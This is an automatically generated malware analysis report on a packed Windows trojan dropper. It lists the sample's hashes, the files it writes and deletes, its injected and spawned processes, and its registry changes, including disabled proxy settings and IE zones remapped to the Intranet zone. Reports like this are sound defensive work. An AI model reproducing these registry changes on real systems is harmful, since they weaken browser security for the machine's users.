Gen.Trojan.Heur.Dropper.hmGfamxW9Ncb_01a6ec54d2

by malwarelabrobot on September 26th, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (B) (Emsisoft), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (AdAware), Trojan.Win32.Swrort.3.FD, PUPHomePages.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, PUP

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 01a6ec54d2ba5e3611ef733ea2747189
SHA1: 2b9e5534a15de090d0e42a199048facac2887052
SHA256: 8eace449341619f902191cdc9dec971c6b3164c8a992b188152062fc0669fc98
SSDeep: 3072:rpdtP1lmEyLL6iAlpJEdULhfTRJ0mNZyV29kxFwsvDctoutU:r9Xm365lpKQB1JjHyV290FwsrctoSU
Size: 117248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-02-28 06:07:37
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896

The Trojan injects its code into the following process(es):

%original file name%.exe:516

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
%WinDir%\system\lock.dat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
%WinDir%\win.ini (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
%WinDir%\lock.log (914 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
%System%\lockie.ini (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
%System%\mswinsck.ocx (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
%WinDir%\sys.dat (7212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
%System%\gdi30.dll (112 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmp (47412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
%System%\drivers\etc\hosts.tmp (2822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
%WinDir%\xdrq\lockie.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (0 bytes)
%System%\drivers\etc\hosts.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%WinDir%\Media\ad.ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (0 bytes)

Registry activity

The process regsvr32.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\MSWinsock.Winsock]
"(Default)" = "Microsoft WinSock Control, version 6.0"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32]
"(Default)" = "%System%\mswinsck.ocx, 1"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"(Default)" = "%System%\mswinsck.ocx"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1]
"(Default)" = "132497"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "IMSWinsockControl"

[HKCR\MSWinsock.Winsock\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Winsock General Property Page Object"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"(Default)" = "%System%\mswinsck.ocx"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32]
"(Default)" = "%System%\mswinsck.ocx"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "DMSWinsockControlEvents"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID]
"(Default)" = "MSWinsock.Winsock"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID]
"(Default)" = "MSWinsock.Winsock.1"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Microsoft WinSock Control, version 6.0"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0]
"(Default)" = "Microsoft Winsock Control 6.0"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS]
"(Default)" = "2"

[HKCR\MSWinsock.Winsock\CurVer]
"(Default)" = "MSWinsock.Winsock.1"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E E2 FC 3D B1 95 0B 9F F5 86 FB 43 AB 39 18 38"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus]
"(Default)" = "0"

[HKCR\MSWinsock.Winsock.1\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\MSWinsock.Winsock.1]
"(Default)" = "Microsoft WinSock Control, version 6.0"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]

The Trojan deletes the following value(s) in system registry:

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"ThreadingModel"

The process regsvr32.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 12 AF FC 0C 86 99 69 34 4E 30 8D EB 42 B6 C3"

[HKCR\Es58.P2P\Clsid]
"(Default)" = "{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0]
"(Default)" = "Es58"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"Version" = "1.0"

[HKCR\Es58.P2P]
"(Default)" = "Es58.P2P"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}]
"(Default)" = "_P2P"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}]
"(Default)" = "Es58.P2P"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\VERSION]
"(Default)" = "1.0"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\ProgID]
"(Default)" = "Es58.P2P"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The process regsvr32.exe:1412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\TypeLib]
"Version" = "4f4.0"
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\yswm.FileIO\Clsid]
"(Default)" = "{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"Version" = "4f4.0"

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\VERSION]
"(Default)" = "1268.0"

[HKCR\yswm.FileIO]
"(Default)" = "yswm.FileIO"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}]
"(Default)" = "yswm.FileIO"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}]
"(Default)" = "_FileIO"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\VERSION]
"(Default)" = "1268.0"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}]
"(Default)" = "_runsoft"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\yswm.runsoft]
"(Default)" = "yswm.runsoft"

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0]
"(Default)" = "yswm"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"

[HKCR\yswm.runsoft\Clsid]
"(Default)" = "{B007063B-34E1-4EA4-BC29-11D1AE806386}"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}]
"(Default)" = "yswm.runsoft"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 FF 4A 2F CB 67 23 3E 5B 37 7D E8 C4 22 48 2B"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\ProgID]
"(Default)" = "yswm.FileIO"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\ProgID]
"(Default)" = "yswm.runsoft"

The process %original file name%.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 E4 2B F3 D7 BE 4E D5 CF B3 F8 F6 17 72 A4 D7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sc.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 BA CA A3 C6 4F D5 87 EF 3F 05 22 35 DB EB C4"

The process sc.exe:896 makes changes in the system registry.
